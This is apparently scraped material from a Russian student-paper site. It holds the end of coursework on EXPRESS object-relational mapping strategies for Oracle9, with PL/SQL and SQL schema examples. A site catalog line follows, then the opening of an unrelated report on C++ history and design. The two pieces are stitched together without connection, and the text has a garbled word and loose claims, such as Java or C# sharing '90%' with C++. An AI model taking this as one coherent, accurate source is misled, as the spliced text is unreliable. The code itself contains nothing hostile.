В качестве хранилища данных реализация объектно-реляционного слоя предусматривает использование реляционных СУБД со схемами, основанными на рассмотренных выше паттернах объектно-реляционного отображения. При этом функции по управлению транзакциями, разрешению запросов, контролю целостности данных, управлению версиями и контролю прав доступа распределяются между сервером объектно-реляционного слоя, через который непосредственно взаимодействуют приложения, и реляционной СУБД, выступающей в роли вторичного хранилища данных.
Важнейшими функциями, реализуемыми непосредственно средствами реляционной СУБД, являются операции манипулирования хранимыми объектами и выполнения простых объектных запросов. С этой целью на языке PL/SQL разрабатываются пакеты программ, эмулирующие объектно-ориентированные интерфейсы доступа к данным путем предоставления функциональных средств для создания, модификации, поиска и удаления объектов. Поскольку полная поддержка объектного языка запросов средствами реляционной СУБД представляется проблематичной с учетом разнообразия императивных конструкций языка EXPRESS, пакеты программ выполняют простейшие виды запросов на основе хранимых объектных идентификаторов (PID), объектных типов и навигационных маршрутов в виде графов переходов по ассоциативным связям типизированных объектов. Поддерживая кэширование объектов, посредник в ряде случаев разрешает запросы самостоятельно, а иногда переадресовывает их реляционной СУБД. При этом происходит редукция клиентского запроса, представленного в общей форме, к запросу упрощенного вида, расширяющего множество объектов и выполнимого пакетом программ реляционной СУБД. Результаты затем обрабатываются посредником с целью исключения объектов, полученных в результате интерпретации упрощенного запроса и не удовлетворяющих исходному.
Поскольку выбор стратегии отображения для реализации объектно-реляционного слоя подобной функциональности крайне неоднозначен с учетом разнообразия потенциальных приложений, предполагается реализация и поддержка нескольких альтернативных стратегий, а именно: схемо-независимого, схемо-зависимого и BLOB подходов. Они базируются на тех или иных сочетаниях рассмотренных выше паттернов ОР отображения и используют собственные пакеты программ на PL/SQL для реализации базовой функциональности объектно-реляционного слоя. Хотя все пакеты реализуют семантически эквивалентные наборы операций для манипулирования объектами и их поиска, их внешние интерфейсы не допускают унификацию в силу ограниченных возможностей языка SQL при формировании клиентских запросов со стороны объектно-реляционного посредника для специфических реляционных схем представления объектно-ориентированных моделей данных. Для адаптации посредника к иным объектно-реляционным стратегиям в его архитектуре предусмотрены специальные компоненты-адаптеры, обеспечивающие требуемую виртуализацию хранилищ данных. Каждый адаптер реализуется с учетом специфики конкретного ОР отображения.
В качестве целевой платформы реализации промежуточного объектно-реляционного слоя выбрана СУБД Oracle9.
7.1 Схемо-независимая стратегия
Разработанная схемо-независимая стратегия состоит в применении обобщенных паттернов AllClasses–OneTable, Attribute–Table, GenericAssociation, GenericSelect, GenericAggregate для отображения схем, классов и атрибутов, а также паттерна представления соответствующих метаданных прикладной модели реляционными таблицами.
Реализованные в среде Oracle9 PL/SQL пакеты обеспечивают выполнение всего базового набора операций с хранимыми объектно-ориентированными данными и запросов к ним. Обобщенная, независимая от конкретных прикладных моделей реализация PL/SQL процедур и функций основана на совместном одновременном использовании данных и метаданных, хранимых в системах таблиц в соответствии с перечисленными паттернами отображения. Приведем описание основных пакетных методов для объектно-реляционного отображения в качестве иллюстрации схемо-независимой стратегии.
Пакет lb_defined_types для работы с метаинформацией о пользовательских типах данных, определенных EXPRESS схемой:
procedure Register_Defined_Type – регистрация в базе данных пользовательского типа схемы;
procedure Save_Enum_Type – сохранение метаданных для перечислимого типа;
procedure Save_Select_Type – сохранение метаданных для селективного типа;
procedure Save_Aggregate_Type – сохранение метаданных для агрегатного типа;
function Get_Type – выдача метаинформации о пользовательском типе данных.
Пакет lb_entity предназначен для работы с метаинформацией, относящейся к объектным типам EXPRESS схемы:
function Register_Entity – регистрация объектного типа схемы;
procedure Save_Attribute – сохранение метаданных для атрибута, определяемого в регистрируемом объектном типе;
procedure Save_Inheritance_Relations – сохранение информации о подтипах и супертипах регистрируемого объектного типа;
function Add_Entity_From_Schema – экспортирование информации об объектном типе из другой схемы;
function Get_Entity – выдача метаинформации об объектном типе;
function Get_Attribute – выдача метаинформации об атрибуте, определяемом в объектном типе схемы.
Пакет lb_instance предназначен для работы с данными: занесения данных в базу, а также для извлечения данных из нее на основе запросов:
function Init_Instance – инициация сохранения объекта;
procedure Init_Attribute_List – инициация сохранения значений атрибутов объекта;
procedure Put_Simple_Attribute_{R, I, S, B, L, E} – сохранение значения атрибута вещественного, целочисленного, символьного, бинарного, логического, перечислимого типа, соответственно;
procedure Put_Association – сохранение значения атрибута ассоциативного типа;
function Put_Aggregate – инициация сохранения элементов агрегата;
function Put_Select – инициация сохранения селективного элемента;
procedure Put_Element_{R, I, S, B, L, E} – сохранение значения элемента агрегатной или селективной конструкции вещественного, целочисленного, символьного, бинарного, логического, перечислимого типа, соответственно;
procedure Get_Instances_By_ID – выборка объектов по заданным идентификаторам;
procedure Get_Instances_By_Type – выборка объектов по заданному типу;
procedure Get_Instances_By_Route – выборка объектов по заданному навигационному маршруту;
procedure Add_Route_Path – метод формирования навигационного маршрута;
procedure Get_All_Instances – выборка всех объектов;
procedure Delete_Instances – удаление объектов по заданным идентификаторам.
До начала работы с прикладными данными соответствующие таблицы метаданных должны быть проинициализированы. С этой целью разработан CASE инструмент, позволяющий автоматически сгенерировать скрипт инициализации соответствующих таблиц на языке PL/SQL по заданной EXPRESS спецификации прикладной модели. Фрагмент данного скрипта для информационной схемы ActorResource представлен ниже.
declare
l_Sch_ID Schemas.sch_id%TYPE;
l_Ent_ID Entities.ent_id%TYPE;
begin
…
lb_defined_types.register_defined_type
('Label','string',l_Sch_ID);
lb_defined_types.register_defined_type
('ActorRole','Label',l_Sch_ID);
lb_defined_types.register_defined_type
('AddressTypeEnum','enumeration',l_Sch_ID);
lb_defined_types.save_enum_type('OFFICE');
lb_defined_types.save_enum_type('HOME');
lb_defined_types.save_enum_type('USERDEFINED');
l_Ent_ID := lb_entity.register_entity
('Organization',l_Sch_ID,false);
lb_entity.save_attribute('Id','integer',1,'','',0,'E');
lb_entity.save_attribute('Name','Label',2,'','',0,'E');
lb_entity.save_attribute
('Description','string',3,'','',1,'E');
lb_entity.save_attribute
('Roles','aggregate',4,'','',0,'E');
lb_entity.save_attribute
('Addresses','aggregate',5,'','',0,'E');
lb_entity.save_attribute
('IsRelatedBy','OrganizationRelationship',
6,'OrganizationRelationship','RelatedOrganizations',0,'I');
lb_entity.save_attribute
('Relates','OrganizationRelationship',
7,'OrganizationRelationship','RelatingOrganization',0,'I');
lb_entity.save_attribute
('Engages','Person',8,'Person','EngagedIn',0,'I');
l_Ent_ID := lb_entity.register_entity
('Address',l_Sch_ID,false);
lb_entity.save_attribute
('Purpose','AddressTypeEnum',1,'','',0,'E');
lb_entity.save_attribute
('UserDefinedPurpose','string',2,'','',1,'E');
lb_entity.save_attribute
('OfPerson','Person',3,'Person','Addresses',0,'I');
lb_entity.save_attribute
('OfOrganization','Organization',
4,'Organization','Addresses',0,'I');
l_Ent_ID := lb_entity.register_entity
('PostalAddress',l_Sch_ID,false);
lb_entity.save_inheritance_relations('Address',false);
lb_entity.save_attribute
('AddressLines','aggregate',1,'','',0,'E');
…
end;
При непосредственной работе с данными адаптер схемо-независимой стратегии осуществляет динамическую трансляцию базовых операций манипулирования объектами того или иного типа в соответствующую последовательность вызовов PL/SQL функций и процедур. На следующем примере можно проследить логику генерации подобных последовательностей. Аналогичным образом реализуются операции модификации, удаления и поиска объектов на основе хранимых идентификаторов, объектных типов и маршрутов навигации.
-- Фрагмент исходного файла с данными в формате ISO-10303-21
#10=POSTALADDRESS(.OFFICE., $,
('25, B.Kommunisticheskaya str., Moscow, 109004, Russia'));
#11=ORGANIZATION(770901001, 'ISP RAS', $,
('Research','Development','Teaching'), (#10));
-- Фрагмент PL/SQL скрипта для занесения данных в БД
DECLARE
type Agg_Level_Type is table of
Aggregates.agg_type%TYPE index by binary_integer;
type Agg_Level_ID is table of
Aggregates.agg_id%TYPE index by binary_integer;
l_Sch_ID Schemas.sch_id%TYPE;
l_Ent_ID Entities.ent_id%TYPE;
l_Ins_ID Instances.ins_id%TYPE;
l_Atr_ID Attributes.atr_id%TYPE;
l_Agg_Type Agg_level_Type;
l_Agg_ID Agg_level_ID;
…
BEGIN
…
l_Ent_ID := lb_entity.get_entity('Organization',l_Sch_ID);
l_Ins_ID := lb_instance.init_instance
(l_Ent_ID,l_MO_ID,l_Rep_ID,'#11');
lb_instance.init_attribute_list(l_Ent_ID);
l_Atr_ID := lb_entity.get_attribute(1);
lb_instance.put_simple_attribute_i
(l_Ins_ID,l_Atr_ID,770901001);
l_Atr_ID := lb_entity.get_attribute(2);
lb_instance.put_simple_attrib_s
(l_Ins_ID,l_Atr_ID,'ISP RAS');
l_Atr_ID := lb_entity.get_attribute(4);
l_Agg_Type(1) := lb_defined_types.get_type
('ActorRole',l_Sch_ID);
l_Agg_ID(1) := lb_instance.put_aggregate(l_Agg_Type(1),
NULL,NULL,l_Atr_ID,l_Ins_ID,l_MO_ID,NULL,NULL);
lb_instance.put_element_s(0,'Research',
NULL,l_Agg_ID(1),NULL);
lb_instance.put_element_s(1,'Development',
NULL,l_Agg_ID(1),NULL);
lb_instance.put_element_s(2,'Teaching',
NULL,l_Agg_ID(1),NULL);
l_Atr_ID := lb_entity.get_attribute(5);
l_Agg_Type(1) := lb_defined_types.get_type
('Address',l_Sch_ID);
l_Agg_ID(1) := lb_instance.put_aggregate
(l_Agg_Type(1),NULL,NULL,l_Atr_ID,l_Ins_ID,
l_MO_ID,NULL,NULL);
lb_instance.put_association
(l_Ins_ID,l_Atr_ID,'#10',0,l_Agg_ID(1),NULL);
l_Ent_ID := lb_entity.get_entity
('PostalAddress',l_Sch_ID);
l_Ins_ID := lb_instance.init_instance
(l_Ent_ID,l_MO_ID,l_Rep_ID,'#10');
lb_instance.init_attribute_list(l_Ent_ID);
l_Atr_ID := lb_entity.get_attribute(1);
lb_instance.put_simple_attribute_e
(l_Ins_ID,l_Atr_ID,'office');
l_Atr_ID := lb_entity.get_attribute(3);
l_Agg_Type(1) := lb_defined_types.get_type
('Label',l_Sch_ID);
l_Agg_ID(1) := lb_instance.put_aggregate(l_Agg_Type(1),
NULL,NULL,l_Atr_ID,l_Ins_ID,l_MO_ID,NULL,NULL);
lb_instance.put_element_s(0,'25, B.Kommunisticheskaya
str.,Moscow, 109004, Russia',NULL,l_Agg_ID(1),NULL);
…
END;
7.2 Схемо-зависимая стратегия
Альтернативу рассмотренному способу реализации объектно-реляционного отображения составляет разработанный вариант схемо-зависимой стратегии, основанный на использовании паттернов отображения классов и атрибутов OneInheritancePath–OneTable, Attribute–Column, ClassAssociation, ClassSelect и ClassAggregate. Данный вариант представляет собой попытку оптимизировать реляционную схему для наиболее эффективной работы с данными внутри одной прикладной модели. Подобная постановка задачи возникает довольно часто на практике и представляет интерес для приложений, оперирующих с одной, возможно масштабной, междисциплинарной прикладной моделью. Указанное сочетание паттернов отображения приводит к большому количеству таблиц, требуемых для адекватного представления объектно-ориентированных данных. Однако при этом оно обеспечивает более эффективную реализацию базовых операций манипулирования объектами. Паттерн OneInheritancePath–OneTable использует преимущества сериализованного представления атрибутов конкретных классов и упрощает компоновку наследуемых атрибутов для объектов выбранных типов. Перечисленные паттерны отображения исключают многоуровневую косвенную адресацию при доступе к таблицам атрибутов и обеспечивают высокую эффективность реализации вспомогательных операций сборки значений из таблиц атрибутов при чтении объектов и их рассылку по соответствующим таблицам при записи и модификации объектов.
Реализация адаптера посредника для схемо-зависимой стратегии существенно отличается от реализации схемо-независимой стратегии. Во-первых, реляционная схема для СУБД генерируется соответствующим CASE инструментом для каждой прикладной модели, специфицированной на языке EXPRESS. Ниже представлен фрагмент описания такой схемы на языке SQL для прикладной модели ActorResource, приведенной ниже. Во-вторых, одновременно со схемой генерируются исходные тексты пакета процедур на языке PL/SQL для манипулирования объектами данной прикладной модели. Каждая процедура пакета ориентирована на работу с объектами определенного типа и имеет специфический для него интерфейс. Поддержка подобных хранимых процедур со стороны реляционной СУБД существенно упрощает реализацию адаптера для посредника и позволяет повысить эффективность его работы за счет компиляции соответствующих директив манипулирования объектами в среде самой СУБД. В-третьих, не требуется какая-либо работа с метаданными, поскольку организация таблиц данных следует структурным особенностям прикладной информационной модели и позволяет явно адресоваться к ним при работе.
-- создание таблицы для описателей объектов схемы
ActorResource
CREATE TABLE actorresource_instance (
PID INTEGER DEFAULT 1 NOT NULL PRIMARY KEY,
Title VARCHAR2(128) NOT NULL,
Entity VARCHAR2(128) NOT NULL,
Model INTEGER NOT NULL,
Commentary VARCHAR2(4000),
FOREIGN KEY (Model) REFERENCES model(PID)
ON DELETE CASCADE
);
CREATE SEQUENCE sq$actorresource_instance;
CREATE UNIQUE INDEX i$actorresource_title_model
ON actorresource_instance (Title, Model);
CREATE INDEX i$actorresource_entity_model
ON actorresource_instance (Entity, Model);
CREATE INDEX i$actorresource_model
ON actorresource_instance (Model);
-- таблица для объектов типа Organization
CREATE TABLE actorresource_organization (
PID INTEGER DEFAULT 1 NOT NULL PRIMARY KEY,
Instance INTEGER NOT NULL,
Id_ INTEGER NOT NULL,
Name_ VARCHAR2(255) NOT NULL,
Description_ VARCHAR2(4000),
FOREIGN KEY (Instance) REFERENCES
actorresource_instance(PID) ON DELETE CASCADE
);
CREATE SEQUENCE sq$actorresource_organization;
CREATE INDEX i$actorresource_organization
ON actorresource_organization (Instance);
CREATE TABLE actorresource_organizat_3 (
PID INTEGER DEFAULT 1 NOT NULL PRIMARY KEY,
Parent INTEGER NOT NULL,
Element_Index1 INTEGER,
Element_Value VARCHAR2(255),
FOREIGN KEY (Parent) REFERENCES
actorresource_organization(PID) ON DELETE CASCADE
);
CREATE SEQUENCE sq$actorresource_organizat_3;
CREATE INDEX i$actorresource_organizat_3
ON actorresource_organizat_3 (Parent);
CREATE TABLE actorresource_organizat_4 (
PID INTEGER DEFAULT 1 NOT NULL PRIMARY KEY,
Parent INTEGER NOT NULL,
Element_Index1 INTEGER,
Element_Value VARCHAR2(128),
FOREIGN KEY (Parent) REFERENCES
actorresource_organization(PID) ON DELETE CASCADE
);
CREATE SEQUENCE sq$actorresource_organizat_4;
CREATE INDEX i$actorresource_organizat_4
ON actorresource_organizat_4 (Parent);
…
7.3 BLOB стратегия
Наконец, третий разработанный вариант реализации адаптера основан на применении BLOB&Text&XML_Encoding паттернов для реляционного представления объектов классов и их атрибутов. Этот вариант воспроизводит упрощенную схему СН стратегии за счет упакованного представления значений атрибутов объекта в виде бинарной или текстовой строки. Сами строки хранятся как элементы записей в таблице объектов BLOB_Instances. Как следствие, таблицы представления простых и сложных атрибутов отсутствуют. Модифицированная таблица Associations хранит ассоциации всех видов и используется для реализации навигационных запросов по ним. Из таблиц метаданных поддерживаются лишь Schemas, Entities, Entities_To_Schemas, Inheritance_Relations, Complex_Entities и Complex_Entities_To_Entities, записи которых воспроизводят отношения наследования классов в прикладной модели и используются для реализации запросов по типам объектов. Соответствующий CASE инструмент позволяет сгенерировать скрипт инициализации таблиц метаданных по спецификации прикладной информационной модели на языке EXPRESS.
Разработанный на языке PL/SQL пакет процедур предоставляет базовый набор операций манипулирования объектами и их поиска по идентификаторам, типам и навигационным маршрутам в рамках BLOB стратегии. Поскольку значения атрибутов объекта представлены в БД единой строкой, функции по упаковке и распаковке строк целиком ложатся на адаптер посредника. В силу этой же причины в рамках BLOB стратегии невозможно выполнение более тонких запросов на основе атрибутных свойств объектов непосредственно средствами СУБД.
8. Рекомендации использования
Таким образом, на основе выделенных паттернов проведена систематизация методов объектно-реляционного отображения. Паттерны отображения информационных схем, классов, атрибутов, метаданных и их сочетания приводят к существенным различиям в организации реляционных таблиц и способах реализации промежуточного объектно-реляционного слоя. Получаемые решения обладают разной степени эффективностью, гибкостью и адаптируемостью к изменениям и развитию прикладных моделей.
Так, приведенный пример реализации схемо-независимой стратегии объектно-реляционного отображения, основанный на фиксированной системе таблиц, может быть рекомендован для использования в приложениях, оперирующих одновременно с несколькими перманентно изменяемыми моделями либо с масштабными промышленными моделями, включающими тысячи классов. Однако эффективность выполнения запросов, а также базовых операций манипулирования объектами при использовании данной стратегии оказывается низкой, поскольку их реализация связана с необходимостью дополнительного анализа таблиц метаданных, а также сборки значений атрибутов объектов из нескольких таблиц при чтении и их обратной рассылки по таблицам при записи.
Частично компенсировать данные недостатки, а также сократить количество необходимых реляционных таблиц позволяет упрощенный вариант реализации схемо-независимой стратегии, основанный на представлении значений атрибутов, упакованных в единую бинарную или текстовую строку (BLOB) и хранимых как элементы записей в таблице объектов. Недостатком данной стратегии является невозможность непосредственной реализации запросов и базовых операций манипулирования объектами средствами самой СУБД. Вся нагрузка здесь ложится на промежуточный слой, выполняющий операции упаковки/распаковки строк со значениями атрибутов. Реализованный вариант BLOB стратегии, описанный в настоящей статье, позволяет разгрузить слой-посредник и выполнить простые запросы по идентификаторам объектов, их типам, а также навигационным маршрутам средствами СУБД, поскольку использует дополнительную систему таблиц для хранения отношений наследования и ассоциативных связей между отдельными объектами.
Наиболее эффективную реализацию запросов и операций манипулирования объектами обеспечивает разработанный вариант схемо-зависимой стратегии, основанный на сериализованном представлении атрибутов конкретных классов. Данная стратегия рекомендуется для использования в приложениях, оперирующих с одной прикладной моделью, включающей несколько сотен классов. Ее недостатками являются большое количество используемых таблиц, критичное для большинства реализаций современных реляционных СУБД, чувствительность к эволюции прикладной модели, а также необходимость применения CASE инструментария для генерации реляционной схемы и процедур, реализующих запросы и операции манипулирования объектами. Подобный инструментарий позволяет существенно упростить сопровождение и администрирование базы данных, эксплуатирующей данную стратегию объектно-реляционного отображения.
Таким образом, разрабатываемый программно-инструментальный комплекс предоставляет развитые средства для эффективной организации промежуточного объектно-реляционного слоя в типовых прикладных контекстах. Представленные рекомендации могут служить конструктивной основой для выбора наиболее оптимальных решений.
Заключение
В данной курсовой работе мы выяснили, что значение языка EXPRESS заключается в описании информационных моделей.
Язык EXPRESS:
опирается на объектно-ориентированный подход
использует разбиение на иерархические уровни
Язык EXPRESS может быть использован двумя путями:
1. прямое использование алгоритмов языка EXPRESS; применение программных средств, а также использование оболочки EXPRESS, с помощью которой создается информационная модель
2. моделирование понятий и функциональных (информационных) связей отдельно; проектирование информационной модели включает 3 этапа:
А) информационное моделирование
Б) функциональное моделирование
В) программная реализация
Второй путь является наиболее предпочтительнее для CALS, т.к. есть разделение функциональных обязанностей.
Информационная модель на языке EXPRESS описывается с помощью схемы, которая может включать в свой состав следующие элементы:
описание типов
описание констант (ввод постоянных)
создание правил
функции
процедуры
Функции и процедуры необходимы для проверки правил, для вычисления каких-то переменных.
Для описания ограничений в EXPRESS вводятся логические функции, их называют глобальными правилами. Пользователь чаще всего работает с локальными правилами.
Язык EXPRESS включил 2 особенности, которых нет у других программных средств:
механизм множественного наследования (генетический механизм). С помощью объявлений можно указать список сущностей, которые являются предками этой сущности, от которой она наследует свойства: атрибуты, правила, алгоритмы, постоянные и т.д. EXPRESSследование осуществляется транзитивно (значит выполняются логические операции, в результате которых меняются свойства у взаимодействующих объектов).
Использование механизма мутации. При наличии в одной схеме нескольких подтипов определенной сущности считается, что в популяции этой сущности возможны объекты с характерными свойствами.
Список используемых источников
В.П. Иванников, С.С. Гайсарян, К.В. Антипин, В.В. Рубанов. Объектно-ориентированное окружение, обеспечивающее доступ к реляционным СУБД. // Труды Института системного программирования РАН, том 2, 2001, c. 89–114.
Судов Е. В., Левин А. И., Давыдов А. Н., Барабанов В. В. Концепция развития CALS-технологий в промышленности России. М.: НИЦ CALS-технологий «Прикладная логистика», 2002.
Ю. Шрейдер. “Социальные аспекты информатики” //Научно-техническая информация, Серия 2, 1989, #1.
Владимир Пржиялковский. “Волшебство нового программирования” // Директору Информационной Службы (ComputerWorld), 2000, #3
Кнорина Л.В. “Природа слова в Универсальном Языке Ньютона” // Научно--техническая информация, Серия 2 , 1994, #9.
1 |
https://doc4web.ru/informatika/yazik-programmirovaniya-c.html | Язык программирования C | https://doc4web.ru/uploads/files/210/3922850406a38d1db5f00fe1dd80c7a1.docx | files/3922850406a38d1db5f00fe1dd80c7a1.docx | Zabot 2003-2004 Все права защищены
ФСПО МГАПИ
Реферат по информационным технологиям
«C++»
Выполнил: студент группы ВМ
Zabot
Проверил: преподаватель
Королёв Н. А.
Москва 2003
Содержание
Почему C++ ……………………………………………………………………….. 1
Возникновение и эволюция языка C++ …….…………….…..…………… 1
Замечания по проекту языка ………………….…..……………………….… 3
Сравнение языков С++ и С …………………………………………………… 4
Эффективность и структура …………………………………………………. 6
КРАТКИЙ ОБЗОР С++ …………………………………………………………... 8
ПАРАДИГМЫ ПРОГРАММИРОВАНИЯ: .……………...……………... 9
Процедурное программирование …..…………………….….. 9
Модульное программирование …………….………………… 9
Абстракция данных …………………………………..…….…… 10
Объектно-ориентированное программирование ..……… 11
Улучшенный С (поддержка процедурного и модульного программирования) ……………………………………………………. 13
Поддержка абстракции данных ……………………….…………….. 14
Поддержка объектно-ориентированного программирования 14
Пределы совершенства …………………………………….….……..……… 15
Заключение ………………….…………………….….………………..…….…. 16
Почему C++
С++ в настоящее время считается господствующим языком, используемым для разработки коммерческих программных продуктов. В последние годы это господство слегка поколебалось вследствие аналогичных претензий со стороны такого языка программирования, как Java, но маятник общественного мнения качнулся в другую сторону, и многие программисты, которые бросили С++ ради Jаvа, в последнее время поспешили вернуться к своей прежней привязанности. В любом случае эти два языка настолько похожи, что, изучив один из них, вы автоматически осваиваете 90% другого.
С# — это новый язык, разработанный Мiсгоsоft для сетевой платформы. По существу С# является разновидностью С++, и несмотря на ряд принципиальных отличий, языки С# и С++ совпадают примерно на 90%. Вероятно, пройдет немало времени, прежде чем язык С# составит серьезную конкуренцию языку С++; но даже если это и произойдет, то знание языка С++ окажется существенным преимуществом.
С++ является языком программирования общего назначения. Естественная для него область применения - системное программирование, понимаемое в широком смысле этого слова. Кроме того, С++ успешно используется во многих областях приложения, далеко выходящих за указанные рамки. Реализации С++ теперь есть на всех машинах, начиная с самых скромных микрокомпьютеров - до самых больших супер-ЭВМ, и практически для всех операционных систем.
Возникновение и эволюция языка C++
Бьерн Страуструп является разработчиком языка С++ и создателем первого транслятора. Он - сотрудник научно-исследовательского вычислительного центра AT&T Bell Laboratories в Мюррей Хилл (Нью-Джерси, США). Он получил звание магистра математики и вычислительной техники в университете г. Аарус (Дания), а докторское звание по вычислительной технике в кэмбриджском университете (Англия). Он специализируется в области распределенных систем, операционных систем, моделирования и программирования. Вместе с М. А. Эллис он является автором полного руководства по языку С++ - "Руководство по С++ с примечаниями".
Безусловно С++ многим обязан языку С [8], который сохраняется как его подмножество. Сохранены и все свойственные С средства низкого уровня, предназначенные для решения самых насущных задач системного программирования. С, в свою очередь, многим обязан своему предшественнику языку BCPL [13]. Комментарий языка BCPL был восстановлен в С++. Еще одним источником вдохновения был язык SIMULA-67 [2,3]; именно из него была заимствована концепция классов (вместе c производными классами и виртуальными функциями). Возможность в С++ перегрузки операций и свобода размещения описаний всюду, где может встречаться оператор, напоминают язык Алгол-68 [24].
Более ранние версии языка, получившие название "С с классами" [16], использовались, начиная с 1980 г. Этот язык возник потому, что автору потребовалось написать программы моделирования, управляемые прерываниями. Язык SIMULA-67 идеально подходит для этого, если не учитывать эффективность. Язык "С с классами" использовался для больших задач моделирования. Строгой проверке подверглись тогда возможности написания на нем программ, для которых критичны ресурсы времени и памяти. В этом языке недоставало перегрузки операций, ссылок, виртуальных функций и многих других возможностей. Впервые С++ вышел за пределы исследовательской группы, в которой работал автор, в июле 1983 г., однако тогда многие возможности С++ еще не были разработаны.
Название С++ (си плюс плюс) , было придумано Риком Маскитти летом 1983 г. Это название отражает эволюционный характер изменений языка С. Обозначение ++ относится к операции наращивания С. Чуть более короткое имя С+ является синтаксической ошибкой. Кроме того, оно уже было использовано как название совсем другого языка. Знатоки семантики С находят, что С++ хуже, чем ++С. Язык не получил названия D, поскольку он является расширением С, и в нем не делается попыток решить какие-либо проблемы за счет отказа от возможностей С. Еще одну интересную интерпретацию названия С++ можно найти в приложении к [12].
Изначально С++ был задуман для того, чтобы автору и его друзьям не надо было программировать на ассемблере, С или других современных языках высокого уровня. Основное его предназначение - упростить и сделать более приятным процесс программирования для отдельного программиста. До недавнего времени не было плана разработки С++ на бумаге. Проектирование, реализация и документирование шли параллельно. Никогда не существовало "проекта С++" или "Комитета по разработке С++". Поэтому язык развивался и продолжает развиваться так, чтобы преодолеть все проблемы, с которыми столкнулись пользователи. Толчками к развитию служат также и обсуждения автором всех проблем с его друзьями и коллегами.
С момента выхода в свет первого издания этой книги язык С++ подвергся существенным изменениям и уточнениям. В основном это касается разрешения неоднозначности при перегрузке, связывании и управлении памятью. Вместе с тем, были внесены незначительные изменения с целью увеличить совместимость с языком С. Были также введены некоторые обобщения и существенные расширения, как то: множественное наследование, функции-члены со спецификациями static и const, защищенные члены (protected), шаблоны типа и обработка особых ситуаций. Все эти расширения и доработки были нацелены на то, чтобы С++ стал языком, на котором можно создавать и использовать библиотеки. Все изменения описываются в [10,18,20,21 и 23].
Другие расширения, введенные за период между 1985 и 1991 г.г. (такие как множественное наследование, статические функции-члены и чистые виртуальные функции), скорее появились в результате обобщения опыта программирования на С++, чем были почерпнуты из других языков.
Сделанные за эти шесть лет расширения языка прежде всего были направлены на повышение выразительности С++ как языка абстракции данных и объектно-ориентированного программирования вообще и как средства для создания высококачественных библиотек с пользовательскими типами данных в частности.
Примерно в 1987 г. стало очевидно, что работа по стандартизации С++ неизбежна и что следует незамедлительно приступить к созданию основы для нее [22].
Фирма AT&T Bell Laboratories внесла основной вклад в эту работу. Около ста представителей из порядка 20 организаций изучали и комментировали то, что стало современной версией справочного руководства и исходными материалами для ANSI по стандартизации. С++. Наконец, по инициативе фирмы Hewlett-Packard в декабре 1989 г. в составе ANSI был образован комитет X3J16. Ожидается, что работы по стандартизации С++ в ANSI (американский стандарт) станут составной частью работ по стандартизации силами ISO (Международной организации по стандартизации).
С++ развивался одновременно с развитием некоторых фундаментальных классов.
Замечания по проекту языка
При разработке языка С++ одним из важнейших критериев выбора была простота. Когда возникал вопрос, что упростить: руководство по языку и другую документацию или транслятор, - то выбор делали в пользу первого. Огромное значение придавалось совместимости с языком С, что помешало удалить его синтаксис.
В С++ нет типов данных и элементарных операций высокого уровня. Например, не существует типа матрица с операцией обращения или типа строка с операцией конкатенации. Если пользователю понадобятся подобные типы, он может определить их в самом языке. Программирование на С++ по сути сводится к определению универсальных или зависящих от области приложения типов. Хорошо продуманный пользовательский тип отличается от встроенного типа только способом определения, но не способом применения.
Из языка исключались возможности, которые могут привести к накладным расходам памяти или времени выполнения, даже если они непосредственно не используются в программе. Например, было отвергнуто предложение хранить в каждом объекте некоторую служебную информацию. Если пользователь описал структуру, содержащую две величины, занимающие по 16 разрядов, то гарантируется, что она поместится в 32-х разрядный регистр.
Язык С++ проектировался для использования в довольно традиционной среде, а именно: в системе программирования С операционной системы UNIX. Но есть вполне обоснованные доводы в пользу использования С++ в более богатой программной среде. Такие возможности, как динамическая загрузка, развитые системы трансляции и базы данных для хранения определений типов, можно успешно использовать без ущерба для языка.
Типы С++ и механизмы упрятывания данных рассчитаны на определенный синтаксический анализ, проводимый транслятором для обнаружения случайной порчи данных. Они не обеспечивают секретности данных и защиты от умышленного нарушения правил доступа к ним. Однако, эти средства можно свободно использовать, не боясь накладных расходов памяти и времени выполнения программы. Учтено, что конструкция языка активно используется тогда, когда она не только изящно записывается на нем, но и вполне по средствам обычным программам.
Сравнение языков С++ и С
Выбор С в качестве базового языка для С++ объясняется следующими его достоинствами:
(1) универсальность, краткость и относительно низкий уровень;
(2) адекватность большинству задач системного программирования;
(3) он идет в любой системе и на любой машине;
(4) полностью подходит для программной среды UNIX.
В С существуют свои проблемы, но в языке, разрабатываемом "с нуля" они появились бы тоже, а проблемы С, по крайней мере, хорошо известны. Более важно то, что ориентация на С позволила использовать язык "С с классами" как полезный (хотя и не очень удобный) инструмент в течение первых месяцев раздумий о введении в С классов в стиле Симулы.
С++ стал использоваться шире, но по мере роста его возможностей, выходящих за пределы С, вновь и вновь возникала проблема совместимости. Ясно, что отказавшись от части наследства С, можно избежать некоторых проблем (см., например, [15]). Это не было сделано по следующим причинам:
(1) существуют миллионы строк программ на С, которые можно улучшить с помощью С++, но при условии, что полной переписи их на язык С++ не потребуется;
(2) существуют миллионы строк библиотечных функций и служебных программ на С, которые можно было бы использовать в С++ при условиях совместимости обоих языков на стадии связывания и их большого синтаксического сходства;
(3) существуют сотни тысяч программистов, знающих С; им достаточно овладеть только новыми средствами С++ и не надо изучать основ языка;
(4) поскольку С и С++ будут использоваться одними и теми же людьми на одних и тех же системах многие годы, различия между языками должны быть либо минимальными, либо максимальными, чтобы свести к минимуму количество ошибок и недоразумений. Описание С++ было переработано так, чтобы гарантировать, что любая допустимая в обоих языках конструкция означала в них одно и то же.
Как язык, так и стандартные библиотеки С++ проектировались в расчете на переносимость. Имеющиеся реализации языка будут работать в большинстве систем, поддерживающих С. В программах на С++ можно использовать библиотеки С. Большинство служебных программ, рассчитанных на С, можно использовать и в С++.
Язык С сам развивался в последние несколько лет, что отчасти было связано с разработкой С++ [14]. Стандарт ANSI для С [27] содержит, например, синтаксис описания функций, позаимствованный из языка "С с классами". Происходит взаимное заимствование, например, тип указателя void* был придуман для ANSI С, а впервые реализован в С++. Как было обещано в первом издании этой книги, описание С++ было доработано, чтобы исключить неоправданные расхождения. Теперь С++ более совместим с языком С, чем это было вначале ($$R.18). В идеале С++ должен максимально приближаться к ANSI C, но не более [9]. Стопроцентной совместимости никогда не было и не будет, поскольку это нарушит надежность типов и согласованность использования встроенных и пользовательских типов, а эти свойства всегда были одними из главных для С++.
